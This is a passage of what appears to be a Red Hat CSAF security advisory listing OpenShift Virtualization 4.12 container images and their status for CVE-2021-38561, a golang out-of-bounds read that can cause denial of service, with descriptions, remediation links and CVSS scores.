"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", }, product_reference: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", }, product_reference: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", }, product_reference: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2022-06-23T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2100495", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", title: "Vulnerability description", }, { category: "summary", text: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", title: "Vulnerability summary", }, { category: "other", text: "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang's library. The overall DoS attack vector depends directly on how the library's input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-38561", }, { category: "external", summary: "RHBZ#2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-38561", url: "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2021-0113", url: "https://pkg.go.dev/vuln/GO-2021-0113", }, ], release_date: "2021-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", 